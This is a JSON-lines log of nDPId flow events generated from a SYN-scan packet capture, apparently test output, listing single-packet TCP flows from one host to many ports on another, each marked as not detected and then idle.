+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1954,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 